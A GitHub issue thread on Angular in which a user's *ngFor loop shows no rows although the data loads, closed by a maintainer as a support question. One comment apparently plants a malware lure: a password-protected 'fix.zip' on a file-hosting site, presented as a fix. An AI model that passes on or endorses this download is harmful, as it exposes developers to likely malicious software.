### ISSUE TITLE
ngFor not displaying array data

### ISSUE THREAD

**Issue by ayrancd** [angular/angular#57581]
### Which @angular/* package(s) are the source of the bug?

Don't known / other

### Is this a regression?

No

### Description

I am getting a post data from the API and I am printing the data into the console, I can see the data I am looking for... in the .html file I am printing {{statsReport.length}} and it shows 200 which is correct but then in the ngFor *ngFor='let item of statsReport' nothing is being displayed.

appService.component
```
  getStats(){
      return this.http.post<any>(this.url+'stats',{},{headers:{'Content-Type': 'application/x-www-form-urlencoded'}});
  }//end loadCountries
```

stats.component
```
    this.appService.getStats().pipe(tap(response => {
         //let parsed = response.data[0].json();
          
          this.statsReport = response.data[0];
          console.log("response", this.statsReport);
                    this.ref.detectChanges();
                    this.ref.markForCheck();
        })).subscribe();
```

stats.html
```
  <tbody>
    <tr *ngFor='let item of statsReport'>
      <th scope="row">1</th>
      <td></td>
      <td>Otto</td>
      <td>{{item.CompanyName}}</td>
      <td>{{item.message}}</td>
    </tr>
  </tbody>
</table>
{{statsReport?.length}}
```

### Please provide the exception or error you saw

```true
There is no error message it just doesn't display anything in the ngFor.
```

### Please provide the environment you discovered this bug in (run `ng version`)

```true
Angular CLI: 9.0.7
Node: 14.15.0
OS: win32 x64

Angular: 9.0.7
... animations, cli, common, compiler, compiler-cli, core, forms
... language-service, localize, platform-browser
... platform-browser-dynamic, router
Ivy Workspace: Yes

Package                           Version
-----------------------------------------------------------
@angular-devkit/architect         0.900.7
@angular-devkit/build-angular     0.900.7
@angular-devkit/build-optimizer   0.900.7
@angular-devkit/build-webpack     0.900.7
@angular-devkit/core              9.0.7
@angular-devkit/schematics        9.0.7
@ngtools/webpack                  9.0.7
@schematics/angular               9.0.7
@schematics/update                0.900.7
rxjs                              6.5.4
typescript                        3.7.5
webpack                           4.41.2
```

**Comment by jungminjun824** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alxhub** [comment]
Hello, we reviewed this issue and determined that it doesn't fall into the bug report or feature request category. This issue tracker is not suitable for support requests, please repost your issue on [StackOverflow](https://stackoverflow.com/) using tag `angular`, or consider asking in the [Angular Community Discord](https://discord.com/invite/angular).

If you are wondering why we don't resolve support issues via the issue tracker, please [check out this explanation](https://github.com/angular/angular/blob/main/CONTRIBUTING.md#question).
